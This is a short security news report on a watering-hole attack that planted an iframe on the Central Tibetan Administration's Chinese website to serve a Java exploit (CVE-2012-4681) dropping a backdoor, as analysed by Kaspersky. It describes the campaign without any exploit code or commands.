14 DAY TRIAL // Researchers warn that the Chinese website of the Central Tibetan Administration (CTA), an organization of the Dalai Lama that militates for restoring freedom for Tibetans, has been compromised.
According to Kaspersky, a piece of malicious code has been planted on the website to redirect visitors to a Java exploit designed to drop a backdoor.
Interestingly, the attack is targeted only at the site’s Chinese visitors. English and Tibetan versions of the site don’t host the iframe that redirects visitors to the Java exploit which drops and executes a backdoor detected as Trojan.Win32.Swisyn.cyxf.
The Java exploit leverages an older vulnerability, CVE-2012-4681, and the backdoor is detected by many antiviruses. However, most of them incorrectly detect it as being a variant of gaming password stealers.
The threat communicates with a command and control server located at news.worldlinking.com. This particular server has been used for Apple-related Java exploits that target the more recent CVE-2013-2423 security hole.
For the time being, a few victims of this attack have been spotted in the United States and China, but experts warn that there could be more.
Currently, the CTA website is still online and it still hosts the malicious code, so users are advised to avoid accessing it.
“This threat actor has been quietly operating these sorts of watering hole attacks for at least a couple of years and also the standard spearphishing campaigns against a variety of targets that include Tibetan groups,” Kaspersky Lab Expert Kurt Baumgartner noted.
Tibetan groups are often targeted by cybercriminals. Back in March, Kaspersky and AlienVault experts analyzed a different attack that leveraged an Adobe Reader vulnerability to distribute a relatively new piece of malware dubbed ItaDuke.
At the time, the attacks relied on an apparently innocent PDF document from the National Endowment for Democracy.